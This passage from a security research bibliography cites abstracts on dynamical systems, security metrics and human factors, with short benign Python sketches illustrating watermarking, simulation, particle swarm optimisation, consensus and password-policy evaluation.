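            if h % GAMMA == 0:               # this tuple is selected for marking
                bit = (h >> 8) & 1           # keyed bit value for this tuple
                value = (value & ~1) | bit   # force the attribute's LSB
            marked.append((pk, value))
        return marked

    print(watermark([(1, 104), (2, 257), (3, 380), (4, 99)]))

Because selection and bit values depend only on the secret key and the primary keys, the owner can re-derive the expected marks from a suspect copy; robustness against tuple addition, alteration, and deletion then comes from marking many tuples redundantly, as the experiments reported above suggest.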


Note:
Articles listed on these pages have been found on open internet pages and are cited with links to those pages. Copyright owners may request the removal of the links to their work or request amendments to the descriptions of their work posted here. Generally, these descriptions are written using the authors' abstracts, but are amended to fit the space available.

Contact: SoS.SurveyProject at gmail.com to remove or amend.





Dynamical Systems

Dynamical Systems


Research into dynamical systems cited here focuses on non-linear and chaotic dynamical systems and on proving abstractions of dynamical systems through numerical simulations. The first paper was presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina.

  • Mitra, S. "Proving Abstractions of Dynamical Systems through Numerical Simulations" HOT SoS 2014 (To be published in 2014 in the Journal of the ACM.) (ID#:14-1362) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf A key question that arises in rigorous analysis of cyberphysical systems under attack involves establishing whether or not the attacked system deviates significantly from the ideal allowed behavior. This is the problem of deciding whether or not the ideal system is an abstraction of the attacked system. A quantitative variation of this question can capture how much the attacked system deviates from the ideal. Thus, algorithms for deciding abstraction relations can help measure the effect of attacks on cyberphysical systems and to develop attack detection strategies. In this paper, we present a decision procedure for proving that one nonlinear dynamical system is a quantitative abstraction of another. Directly computing the reach sets of these nonlinear systems is undecidable in general, and reach set over-approximations do not give a direct way of proving abstraction. Our procedure uses (possibly inaccurate) numerical simulations and a model annotation to compute tight approximations of the observable behaviors of the system and then uses these approximations to decide on abstraction. We show that the procedure is sound and that it is guaranteed to terminate under reasonable robustness assumptions. Keywords: cyberphysical systems, adversary, simulation, verification, abstraction.
  • Dong Juny; Li Donghai, "Nonlinear robust control for complex dynamical systems," Control Conference (CCC), 2013 32nd Chinese , vol., no., pp.5509,5514, 26-28 July 2013. (ID#:14-1363) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6640400&isnumber=6639389 The plants of complex dynamical systems consist of a real part and an imaginary part, and there exists strong coupling between them. In this paper, the nonlinear robust controller is applied to the control of six typical complex dynamical systems expressed as differential equations. Two control schemes are designed. One scheme treats the real part and imaginary part of the complex dynamical system as a whole to design a single-input single-output control system; the other scheme deals with the real part and imaginary part independently to design a two-input two-output control system. The simulated results show that the nonlinear robust controller can achieve effective control of complex dynamical systems, and that the two control schemes achieve the same control performance given the same initial system states and controller parameters. Keywords: control system synthesis; differential equations; large-scale systems; nonlinear control systems; robust control; time-varying systems; complex dynamical systems; control system design; differential equations; nonlinear robust control; single-input single-output control system; two-input two-output control system; Control systems; Electronic mail; Frequency modulation; Power system dynamics; Robust control; Robustness; Thermal engineering; complex dynamical systems; nonlinear robust controller; the imaginary part; the real part
  • Brito Palma, L.; Costa Cruz, J.; Vieira Coito, F.; Sousa Gil, P., "Interactive demonstration of a java-based simulator of dynamical systems," Experiment@ International Conference (exp.at'13), 2013 2nd, vol., no., pp.176,177, 18-20 Sept. 2013 (ID#:14-1364) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6703061&isnumber=6703017 In this paper, an interactive demonstration of a java-based simulator of dynamical systems is presented. This simulator implements linear low-order process models (first order, second order and third order). Open-loop control and closed-loop tests can be done with the application. The main contribution is a Java application that can be used by the instructor / user in a blended learning environment to teach / learn the basic notions of dynamical systems, in open-loop control and also in closed-loop control, running on all the most popular operating systems. Keywords: Java ;closed loop systems; computer aided instruction; control engineering computing; control engineering education; digital simulation; interactive systems; open loop systems; Java-based simulator; automatic control; blended learning environment; closed-loop control; closed-loop tests; dynamical systems; interactive demonstration; linear low-order process models; open-loop control; operating systems; Control systems; Java; Remote laboratories; Software; Time factors; Transfer functions; automatic control; dynamical systems; engineering education ; learning systems; simulation
  • Kim, K.-K.K.; Shen, D.E.; Nagy, Z.K.; Braatz, R.D., "Wiener's Polynomial Chaos for the Analysis and Control of Nonlinear Dynamical Systems with Probabilistic Uncertainties [Historical Perspectives]," Control Systems, IEEE , vol.33, no.5, pp.58,67, Oct. 2013. (ID#:14-1365) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6595094&isnumber=6595035 One purpose of the "Historical Perspectives" column is to look back at work done by pioneers in control and related fields that has been neglected for many years but was later revived in the control literature. This column discusses the topic of Norbert Wiener's most cited paper, which proposed polynomial chaos expansions (PCEs) as a method for probabilistic uncertainty quantification in nonlinear dynamical systems. PCEs were almost completely ignored until the turn of the new millennium, when they rather suddenly attracted a huge amount of interest in the noncontrol literature. Although the control engineering community has studied uncertain systems for decades, all but a handful of researchers in the systems and control community have ignored PCEs. The purpose of this column is to present a concise introduction to PCEs, provide an overview of the theory and applications of PCE methods in the control literature, and to consider the question of why PCEs have only recently appeared in the control literature. Keywords: chaos; control system analysis; nonlinear control systems; nonlinear dynamical systems; polynomials; probability; uncertain systems; PCE; Wiener polynomial chaos expansion; nonlinear dynamical system analysis; nonlinear dynamical system control; probabilistic uncertainty quantification; uncertain systems; Approximation methods; Computational modeling; History; Mathematical model; Nonlinear systems; Probabilistic logic; Random variables; Uncertainty
  • Masuda, Kazuaki, "A method for finding stable-unstable bifurcation points of nonlinear dynamical systems by using a Particle Swarm Optimization algorithm," SICE Annual Conference (SICE), 2013 Proceedings of , vol., no., pp.554,559, 14-17 Sept. 2013. (ID#:14-1506) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6736201&isnumber=6736144 In this paper, we propose a method for finding stable-unstable bifurcation points of nonlinear dynamical systems by using a Particle Swarm Optimization (PSO) algorithm. Since the structure of systems can change suddenly at such points, it is desirable to find them in advance for engineering purposes such as design and control. We formulate a mathematical optimization problem to find a particular type of bifurcation point of nonlinear black-box systems, and we solve it numerically by employing a PSO algorithm. The practicality of the proposed method is investigated by numerical experiments. Keywords: Aerospace electronics; Bifurcation; Linear programming; Nonlinear dynamical systems; Optimization; Trajectory; Vectors; Nonlinear dynamical systems; Particle Swarm Optimization (PSO); bifurcation; constrained optimization; multiple optimal solutions search (A toy PSO-based search for a fold bifurcation appears after this list.)
  • Wenwu Yu; Guanrong Chen; Ming Cao; Wei Ren, "Delay-Induced Consensus and Quasi-Consensus in Multi-Agent Dynamical Systems," Circuits and Systems I: Regular Papers, IEEE Transactions on , vol.60, no.10, pp.2679,2687, Oct. 2013. (ID#:14-1507) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6495500&isnumber=6609087 This paper studies consensus and quasi-consensus in multi-agent dynamical systems. A linear consensus protocol in the second-order dynamics is designed where both the current and delayed position information is utilized. Time delay, in a common perspective, can induce periodic oscillations or even chaos in dynamical systems. However, it is found in this paper that consensus and quasi-consensus in a multi-agent system cannot be reached without the delayed position information under the given protocol, while they can be achieved with a relatively small time delay by appropriately choosing the coupling strengths. A necessary and sufficient condition for reaching consensus in multi-agent dynamical systems is established. It is shown that consensus and quasi-consensus can be achieved if and only if the time delay is bounded by some critical value which depends on the coupling strength and the largest eigenvalue of the Laplacian matrix of the network. The motivation for studying quasi-consensus is provided where the potential relationship between the second-order multi-agent system with delayed positive feedback and the first-order system with distributed-delay control input is discussed. Finally, simulation examples are given to illustrate the theoretical analysis. Keywords: delays; eigenvalues and eigen functions; feedback; graph theory; multi-agent systems; protocols; Laplacian matrix; delayed position information; delayed positive feedback; distributed-delay control input; eigenvalue; linear consensus protocol; multiagent dynamical systems; periodic oscillations; quasiconsensus; second-order dynamics; time delay; Algebraic graph theory; delay-induced consensus; multi-agent system; quasi-consensus (A small simulation of delay-induced consensus appears after this list.)
  • Zhaoyan Wu; Xinchu Fu, "Structure identification of uncertain dynamical networks coupled with complex-variable chaotic systems," Control Theory & Applications, IET , vol.7, no.9, pp.1269,1275, June 13 2013. (ID#:14-1508) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6578539&isnumber=6578529 This paper recognizes that, in practical applications, the topological structures of uncertain dynamical networks cannot all be determined in advance. The authors propose a structure identification method for uncertain dynamical networks coupled with complex-variable chaotic systems. The proposed method is based on Barbalat's lemma and is verified in this paper with numerical simulations. Keywords: chaos; complex networks; nonlinear dynamical systems; numerical analysis; topology; uncertain systems; Barbalat's lemma; complex-variable chaotic systems; network estimators; node dynamics; numerical simulations; uncertain dynamical networks; uncertain topological structure.
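
Mitra's simulation-based abstraction result above can be illustrated with a deliberately simple sketch. This is not the paper's decision procedure (which uses model annotations and carries soundness and termination guarantees); it merely shows the underlying idea on two invented one-dimensional systems, an "ideal" model and an "attacked" variant: both are simulated from sampled initial states, and the attacked system passes the quantitative abstraction check if every sampled trace stays within a tolerance eps of the corresponding ideal trace.

    import numpy as np

    def simulate(f, x0, dt=0.01, steps=500):
        # Forward-Euler simulation of dx/dt = f(x) starting from x0.
        traj = np.empty(steps + 1)
        traj[0] = x0
        for k in range(steps):
            traj[k + 1] = traj[k] + dt * f(traj[k])
        return traj

    # Invented example systems: an ideal model and an attacked variant
    # with a small bounded disturbance injected by the adversary.
    f_ideal = lambda x: -x + 0.1 * np.sin(x)
    f_attacked = lambda x: -x + 0.1 * np.sin(x) + 0.05

    def within_abstraction(f_abs, f_conc, init_states, eps):
        # Crude check: every sampled trace of the concrete (attacked)
        # system must stay within eps of the abstract (ideal) trace
        # started from the same initial state.
        for x0 in init_states:
            gap = np.abs(simulate(f_conc, x0) - simulate(f_abs, x0)).max()
            if gap > eps:
                return False
        return True

    print(within_abstraction(f_ideal, f_attacked,
                             np.linspace(-1.0, 1.0, 21), eps=0.1))

A real procedure must also account for behaviors between the sampled initial states, which is exactly what the paper's annotations and bloated simulation traces provide.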
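
As a companion to Masuda's paper above, here is a toy particle swarm search for a fold (saddle-node) bifurcation of the invented normal-form system dx/dt = r + x^2. A fold occurs exactly where the equilibrium condition r + x^2 = 0 and the degeneracy condition df/dx = 2x = 0 hold simultaneously, i.e. at (x, r) = (0, 0). The PSO coefficients are generic textbook values, not those of the paper.

    import numpy as np

    rng = np.random.default_rng(0)

    def objective(p):
        # Sum of squared residuals of the two bifurcation conditions.
        x, r = p
        return (r + x**2) ** 2 + (2.0 * x) ** 2

    n, dim, iters = 30, 2, 200
    pos = rng.uniform(-2, 2, (n, dim))        # particle positions (x, r)
    vel = np.zeros((n, dim))
    pbest = pos.copy()                        # personal bests
    pbest_val = np.apply_along_axis(objective, 1, pos)
    gbest = pbest[pbest_val.argmin()].copy()  # global best

    for _ in range(iters):
        r1, r2 = rng.random((n, dim)), rng.random((n, dim))
        vel = 0.7 * vel + 1.5 * r1 * (pbest - pos) + 1.5 * r2 * (gbest - pos)
        pos += vel
        val = np.apply_along_axis(objective, 1, pos)
        better = val < pbest_val
        pbest[better], pbest_val[better] = pos[better], val[better]
        gbest = pbest[pbest_val.argmin()].copy()

    print("estimated bifurcation point (x, r):", gbest)  # expect near (0, 0)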
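
The delay-induced consensus phenomenon reported by Yu, Chen, Cao, and Ren above can be seen in a small simulation. The sketch below uses one plausible protocol form combining current and delayed position feedback, u = -k1*L*x(t) + k2*L*x(t - tau); the graph, gains, and delay values are invented for illustration and are not the paper's exact parameterization. With a near-zero delay the double integrators oscillate without settling, while a moderate delay supplies the damping needed for consensus.

    import numpy as np
    from collections import deque

    # Laplacian of a 3-agent path graph (largest eigenvalue is 3).
    L = np.array([[ 1., -1.,  0.],
                  [-1.,  2., -1.],
                  [ 0., -1.,  1.]])

    def final_spread(tau, k1=2.0, k2=1.0, dt=1e-3, T=40.0):
        # Second-order agents under u = -k1*L@x(t) + k2*L@x(t - tau).
        # Since x(t) - x(t - tau) ~ tau * xdot, the delayed term acts
        # like velocity damping, which pure position feedback lacks.
        d = max(1, int(round(tau / dt)))
        x = np.array([0.0, 1.0, 3.0])
        v = np.zeros(3)
        hist = deque(x.copy() for _ in range(d))  # hist[0] == x(t - tau)
        for _ in range(int(T / dt)):
            a = -k1 * (L @ x) + k2 * (L @ hist[0])
            hist.popleft()
            hist.append(x.copy())
            v = v + dt * a                        # symplectic Euler step
            x = x + dt * v
        return x.max() - x.min()

    for tau in (1e-3, 0.3, 2.0):  # near-zero, moderate, and large delay
        print(f"tau={tau}: final position spread = {final_spread(tau):.3g}")

Consistent with the paper's necessary and sufficient condition, consensus is obtained only for delays below a critical value that depends on the coupling strengths and the largest Laplacian eigenvalue.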


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Effectiveness and Work Factor Metrics

Effectiveness and Work Factor Metrics


It is difficult to measure the relative strengths and weaknesses of modern information systems when the safety, security, and reliability of those systems must be protected. Developers often apply security mechanisms to systems without the ability to evaluate the impact of those mechanisms on the overall system. Few efforts are directed at actually measuring the quantifiable impact of information assurance technology on the potential adversary. The research cited here describes analytic tools, methods, and processes for measuring and evaluating software, networks, and authentication.

  • Frank L. Greitzer, Thomas A. Ferryman, "Methods and Metrics for Evaluating Analytic Insider Threat Tools" SPW '13 Proceedings of the 2013 IEEE Security and Privacy Workshops, May 2013. (Pages 90-97). (ID#:14-1384) Available at: http://dl.acm.org/citation.cfm?id=2510662.2511480&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1109/SPW.2013.34 The insider threat is a prime security concern for government and industry organizations. As insider threat programs come into operational practice, there is a continuing need to assess the effectiveness of tools, methods, and data sources, which enables continual process improvement. This is particularly challenging in operational environments, where the actual number of malicious insiders in a study sample is not known. The present paper addresses the design of evaluation strategies and associated measures of effectiveness; several quantitative/statistical significance test approaches are described with examples, and a new measure, the Enrichment Ratio, is proposed and described as a means of assessing the impact of proposed tools on the organization's operations. Keywords: insider threat, evaluation, validation, metrics, assessment (A toy calculation of one plausible reading of the Enrichment Ratio appears after this list.)
  • Inuma, M.; Otsuka, A., "Relations Among Security Metrics For Template Protection Algorithms," Biometrics: Theory, Applications and Systems (BTAS), 2013 IEEE Sixth International Conference on , vol., no., pp.1,8, Sept. 29 2013-Oct. 2 2013. (ID#:14-1385) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6712714&isnumber=6712682 This paper gives formal definitions for the security metrics proposed by Simoens et al. [11] and Nagar et al. [1], and analyzes the relations between them. [11] defined comprehensive metrics for all biometric template protection algorithms; their security-related metrics are defined as measurements of performance in various settings, whereas [1] defined similar but different performance-based metrics with a focus on the two-factor authentication scenario. One problem with performance-based metrics is their ambiguous relation to the security goals often discussed in the context of biometric cryptosystems [7]. The objective of this paper is to complement the previous work by Simoens et al. [11] in two points: (1) it gives formal definitions for the metrics defined in [11] in order to make them applicable to biometric cryptosystems, and (2) it covers all security metrics for every variation of the two-factor authentication scenario, namely where both or either of the key and/or the protected template is given to the adversary. Keywords: biometrics (access control); cryptography; biometric cryptosystems; biometric template protection algorithm; performance-based metrics; security metrics; two-factor authentication scenario; Accuracy; Authentication; Databases; Feature extraction; Games; Measurement
  • Srivastava, S.; Kumar, R., "Indirect Method To Measure Software Quality Using CK-OO Suite," Intelligent Systems and Signal Processing (ISSP), 2013 International Conference on , vol., no., pp.47,51, 1-2 March 2013. (ID#:14-1386) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6526872&isnumber=6526858 In this paper, we consider experiential evidences in support of a set of object-oriented software metrics. In particular, we look at the object oriented design metrics of Chidamber and Kemerer, and their applicability in different application domains. Many of the early quality models have followed an approach, in which a set of factors that influence quality and relationships between different quality factors, are defined, with little scope of measurement. But the measurement plays an important role in every phase of software development process. The work, therefore, emphasizes on quantitative measurement of different quality attributes such as reusability, maintainability, testability, reliability and efficiency. With the widespread use of Object Oriented Technologies, CK metrics have proved to be very useful. So we have used CK metrics for measurement of these qualities attributes. The quality attributes are affected by values of CK metrics. We have derived linearly related equations from CK metrics to measure these quality attributes. Different concepts about software quality characteristics are reviewed and discussed in the Dissertation. We briefly describe the metrics, and present our empirical findings, arising from our analysis of systems taken from a number of different application domains. Our investigations have led us to conclude that a subset of the metrics can be of great value to software developers, maintainers and project managers. We have also taken an empirical study in Object Oriented language C++. Keywords: C++ language; object-oriented methods; program testing; software maintenance; software metrics; software quality; software reliability; software reusability; C++;CK metrics; CK-OO suite; maintainability; object oriented design metrics; object oriented language; object oriented technologies; object-oriented software metrics; reliability; reusability; software development process; software quality ;testability; S/W Quality; S/W measurement; matrices
  • Zhu, Qi; Deng, Peng; Di Natale, Marco; Zeng, Haibo, "Robust And Extensible Task Implementations Of Synchronous Finite State Machines," Design, Automation & Test in Europe Conference & Exhibition (DATE), 2013 , vol., no., pp.1319,1324, 18-22 March 2013. (ID#:14-1387) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6513718&isnumber=6513446 Model-based design using synchronous reactive (SR) models is widespread for the development of embedded control software. SR models ease verification and validation, and enable the automatic generation of implementations. In SR models, synchronous finite state machines (FSMs) are commonly used to capture changes of the system state under trigger events. The implementation of a synchronous FSM may be improved by using multiple software tasks instead of the traditional single-task solution. In this work, we propose methods to quantitatively analyze task implementations with respect to a breakdown factor that measures the timing robustness, and an action extensibility metric that measures the capability to accommodate upgrades. We propose an algorithm to generate a correct and efficient task implementation of synchronous FSMs for these two metrics, while guaranteeing the schedulability constraints.
  • Barrows, Clayton; Blumsack, Seth; Bent, Russell, "Using Network Metrics to Achieve Computationally Efficient Optimal Transmission Switching," System Sciences (HICSS), 2013 46th Hawaii International Conference on , vol., no., pp.2187,2196, 7-10 Jan. 2013. (ID#:14-1388) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6480106&isnumber=6479821 Recent studies have shown that dynamic removal of transmission lines from operation ("Transmission Switching") can reduce costs associated with power system operation. Smart Grid systems introduce flexibility into the transmission network topology and enable co-optimization of generation and network topology. The optimal transmission switching (OTS) problem has been posed on small test systems, but problem complexity and large system sizes make OTS intractable. Our previous work suggests that most economic benefits of OTS arise through switching a small number of lines, so pre-screening has the potential to produce good solutions in less time. We explore the use of topological and electrical graph metrics to increase solution speed via solution space reduction. We find that screening based on line outage distribution factors outperforms other methods. When compared to un-screened OTS on the RTS-96 and IEEE 118-Bus networks, the sensitivity-based screen generates near optimal solutions in a fraction of the time. Keywords: Generators; Load flow; Network topology; Power system reliability; Power transmission lines; Security; Switches; Optimization; Power Systems; Smart Grid; Transmission Switching
  • Gul Calikli, Ayse Basar Bener. "Influence Of Confirmation Biases Of Developers On Software Quality: An Empirical Study" Journal of Software Quality Control. Volume 21 Issue 2, June 2013 (Pages 377-416). (ID#:14-1389) Available at: http://dl.acm.org/citation.cfm?id=2458014.2458019&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1007/s11219-012-9180-0 The thought processes of people have a significant impact on software quality, as software is designed, developed and tested by people. Cognitive biases, which are defined as patterned deviations of human thought from the laws of logic and mathematics, are a likely cause of software defects. However, there is little empirical evidence to date to substantiate this assertion. In this research, we focus on a specific cognitive bias, confirmation bias, which is defined as the tendency of people to seek evidence that verifies a hypothesis rather than seeking evidence to falsify a hypothesis. Due to this confirmation bias, developers tend to perform unit tests to make their program work rather than to break their code. Therefore, confirmation bias is believed to be one of the factors that lead to an increased software defect density. In this research, we present a metric scheme that explores the impact of developers' confirmation bias on software defect density. In order to estimate the effectiveness of our metric scheme in the quantification of confirmation bias within the context of software development, we performed an empirical study that addressed the prediction of the defective parts of software. In our empirical study, we used confirmation bias metrics on five datasets obtained from two companies. Our results provide empirical evidence that human thought processes and cognitive aspects deserve further investigation to improve decision making in software development for effective process management and resource allocation. Keywords: Confirmation bias, Defect prediction, Human factors, Software psychology, work metrics
  • Alistair Moffat, Paul Thomas, Falk Scholer, "Users Versus Models: What Observation Tells Us About Effectiveness Metrics" CIKM '13: Proceedings of the 22nd ACM International Conference on Information & Knowledge Management, October 2013. (ID#:14-1390) Available at: http://dl.acm.org/citation.cfm?id=2505515.2507665&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2505515.2507665 Retrieval system effectiveness can be measured in two quite different ways: by monitoring the behavior of users and gathering data about the ease and accuracy with which they accomplish certain specified information-seeking tasks; or by using numeric effectiveness metrics to score system runs in reference to a set of relevance judgments. In the second approach, the effectiveness metric is chosen in the belief that user task performance, if it were to be measured by the first approach, should be linked to the score provided by the metric. This work explores that link, by analyzing the assumptions and implications of a number of effectiveness metrics, and exploring how these relate to observable user behaviors. Data recorded as part of a user study included user self-assessment of search task difficulty; gaze position; and click activity. Our results show that user behavior is influenced by a blend of many factors, including the extent to which relevant documents are encountered, the stage of the search process, and task difficulty. These insights can be used to guide development of batch effectiveness metrics. Keywords: evaluation, retrieval experiment, system measurement
  • Nathaniel Husted, Steven Myers, Abhi Shelat, Paul Grubbs. "GPU And CPU Parallelization Of Honest-But-Curious Secure Two-Party Computation" ACSAC '13 Proceedings of the 29th Annual Computer Security Applications Conference December 2013 (Pages 169-178) . (ID#:14-1391) Available at: http://dl.acm.org/citation.cfm?id=2523649.2523681&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2523649.2523681 Recent work demonstrates the feasibility and practical use of secure two-party computation [5, 9, 15, 23]. In this work, we present the first Graphical Processing Unit (GPU)-optimized implementation of an optimized Yao's garbled-circuit protocol for two-party secure computation in the honest-but-curious and 1-bit-leaked malicious models. We implement nearly all of the modern protocol advancements, such as Free-XOR, Pipelining, and OT extension. Our implementation is the first allowing entire circuits to be generated concurrently, and makes use of a modification of the XOR technique so that circuit generation is optimized for implementation on SIMD architectures of GPUs. In our best cases we generate about 75 million gates per second and we exceed the state of the art performance metrics on modern CPU systems by a factor of about 200, and GPU systems by about a factor of 2.3. While many recent works on garbled circuits exploit the embarrassingly parallel nature of many tasks that are part of a secure computation protocol, we show that there are still various forms and levels of parallelization that may yet improve the performance of these protocols. In particular, we highlight that implementations on the SIMD architecture of modern GPUs require significantly different approaches than the general purpose MIMD architecture of multi-core CPUs, which again differ from the needs of parallelizing on compute clusters. Additionally, modifications to the security models for many common protocols have large effects on reasonable parallel architectures for implementation.
  • Jeremiah Blocki, Saranga Komanduri, Ariel Procaccia, Or Sheffet. "Optimizing Password Composition Policies" EC '13: Proceedings Of The Fourteenth ACM Conference On Electronic Commerce June 2013 (Pages 105-122). (ID#:14-1392) Available at: http://dl.acm.org/citation.cfm?id=2492002.2482552&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2482540.2482552 A password composition policy restricts the space of allowable passwords to eliminate weak passwords that are vulnerable to statistical guessing attacks. Usability studies have demonstrated that existing password composition policies can sometimes result in weaker password distributions; hence a more principled approach is needed. We introduce the first theoretical model for optimizing password composition policies. We study the computational and sample complexity of this problem under different assumptions on the structure of policies and on users' preferences over passwords. Our main positive result is an algorithm that, with high probability, constructs almost optimal policies (which are specified as a union of subsets of allowed passwords), and requires only a small number of samples of users' preferred passwords. We complement our theoretical results with simulations using a real-world dataset of 32 million passwords. Keywords: computational complexity, password composition policy, sampling, security (A toy illustration of evaluating policies by sampling appears after this list.)
  • Georgios Kontaxis, Elias Athanasopoulos, Georgios Portokalidis, Angelos D. Keromytis "SAuth: Protecting User Accounts From Password Database Leaks" CCS '13: Proceedings of the 2013 ACM SIGSAC Conference On Computer & Communications Security November 2013 (Pages 187-198). (ID#:14-1393) Available at: http://dl.acm.org/citation.cfm?id=2508859.2516746&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://doi.acm.org/10.1145/2508859.2516746 Password-based authentication is the dominant form of access control in web services. Unfortunately, it proves to be more and more inadequate every year. Even if users choose long and complex passwords, vulnerabilities in the way they are managed by a service may leak them to an attacker. Recent incidents in popular services such as LinkedIn and Twitter demonstrate the impact that such an event could have. The use of one-way hash functions to mitigate the problem is countered by the evolution of hardware which enables powerful password-cracking platforms. In this paper we propose SAuth, a protocol which employs authentication synergy among different services. Users wishing to access their account on service S will also have to authenticate for their account on service V, which acts as a vouching party. Both services S and V are regular sites visited by the user everyday (e.g., Twitter, Facebook, Gmail). Should an attacker acquire the password for service S he will be unable to log in unless he also compromises the password for service V and possibly more vouching services. SAuth is an extension and not a replacement of existing authentication methods. It operates one layer above without ties to a specific method, thus enabling different services to employ heterogeneous systems. Finally we employ password decoys to protect users that share a password across services. Keywords: Security and privacy, Security services, Authentication, decoys, password leak, synergy
  • Majdi Abdellatief, Abu Bakar Md Sultan, Abdul Azim Abdul Ghani, Marzanah A. Jabar . "A Mapping Study To Investigate Component-Based Software System Metrics" Journal of Systems and Software , Volume 86 Issue 3 March 2013 (Pages 587-603) . (ID#:14-1394) Available at: http://dl.acm.org/citation.cfm?id=2430750.2430927&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 or http://dx.doi.org/10.1016/j.jss.2012.10.001 A component-based software system (CBSS) is a software system that is developed by integrating components that have been deployed independently. In the last few years, many researchers have proposed metrics to evaluate CBSS attributes. However, the practical use of these metrics can be difficult. For example, some of the metrics have concepts that either overlap or are not well defined, which could hinder their implementation. The aim of this study is to understand, classify and analyze existing research in component-based metrics, focusing on approaches and elements that are used to evaluate the quality of CBSS and its components from a component consumer's point of view. This paper presents a systematic mapping study of several metrics that were proposed to measure the quality of CBSS and its components. We found 17 proposals that could be applied to evaluate CBSSs, while 14 proposals could be applied to evaluate individual components in isolation. Various elements of the software components that were measured are reviewed and discussed. Only a few of the proposed metrics are soundly defined. The quality assessment of the primary studies detected many limitations and suggested guidelines for possibilities for improving and increasing the acceptance of metrics. However, it remains a challenge to characterize and evaluate a CBSS and its components quantitatively. For this reason, much effort must be made to achieve a better evaluation approach in the future. Keywords: Component-based software system, Software components, Software metrics, Software quality, Systematic mapping study
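
The Enrichment Ratio proposed by Greitzer and Ferryman (first entry in this list) is not spelled out in the abstract. One plausible reading, offered here purely as an illustration and not as the paper's definition, is the prevalence of true insiders among tool-flagged cases relative to the base rate in the monitored population, so that a value of 1.0 means the tool adds nothing over random selection.

    def enrichment_ratio(flagged_true, flagged_total, pop_true, pop_total):
        # Hypothetical formulation: how much more prevalent true positives
        # are in the tool's flagged set than in the population at large.
        return (flagged_true / flagged_total) / (pop_true / pop_total)

    # A tool flags 50 of 10,000 monitored users; 5 of the 50 are actual
    # insiders, versus 10 insiders in the whole population.
    print(enrichment_ratio(5, 50, 10, 10_000))  # 100.0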
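
The backfiring effect that motivates Blocki et al.'s work on password composition policies (cited above) is easy to reproduce. The toy sketch below estimates, from a sample of preferred passwords, the success probability of a statistical guesser's single best guess under a candidate policy. Users whose preference is banned are simply dropped, a crude stand-in for the paper's preference model, and all sample data are invented.

    from collections import Counter

    def top_guess_mass(sample, policy):
        # Probability that an attacker's single most popular guess
        # succeeds, estimated from the sampled preferred passwords
        # that survive the policy.
        allowed = [p for p in sample if policy(p)]
        if not allowed:
            return 1.0
        return Counter(allowed).most_common(1)[0][1] / len(allowed)

    sample = (["123456"] * 30 + ["password"] * 20 +
              ["correct horse"] * 5 + ["Tr0ub4dor&3"] * 2 + ["zxcvbn"] * 3)

    print(top_guess_mass(sample, lambda p: True))         # 0.50
    print(top_guess_mass(sample, lambda p: len(p) >= 8))  # ~0.74: worse!

Here a minimum-length rule bans "123456" but concentrates the remaining mass on "password", weakening the distribution; this is exactly the kind of outcome a principled policy optimizer is meant to avoid.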


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Human Factors

Human Factors


Automated defenses are often the first line against cyber-attacks, but human factors play a major role in both attack and defense. The fourteen papers cited here examine a number of issues related to human factors that can expose vulnerabilities. The first four papers were presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina.

  • Lucas Layman, Sylvain David Diffo, Nico Zazworka. "Human Factors in Webserver Log File Analysis: A Controlled Experiment on Investigating Malicious Activity" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in the Journal of the ACM, 2014) (ID#:14-1395) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf While automated methods are the first line of defense for detecting attacks on webservers, a human agent is required to understand the attacker's intent and the attack process. The goal of this research is to understand the value of various log fields and the cognitive processes by which log information is grouped, searched, and correlated. Such knowledge will enable the development of human-focused log file investigation technologies. We performed controlled experiments with 65 subjects (IT professionals and novices) who investigated excerpts from six webserver log files. Quantitative and qualitative data were gathered to: 1) analyze subject accuracy in identifying malicious activity; 2) identify the most useful pieces of log file information; and 3) understand the techniques and strategies used by subjects to process the information. Statistically significant effects were observed in the accuracy of identifying attacks and time taken depending on the type of attack. Systematic differences were also observed in the log fields used by high-performing and low-performing groups. The findings include: 1) new insights into how specific log data fields are used to effectively assess potentially malicious activity; 2) obfuscating factors in log data from a human cognitive perspective; and 3) practical implications for tools to support log file investigations. Keywords: security, science of security, log files, human factors
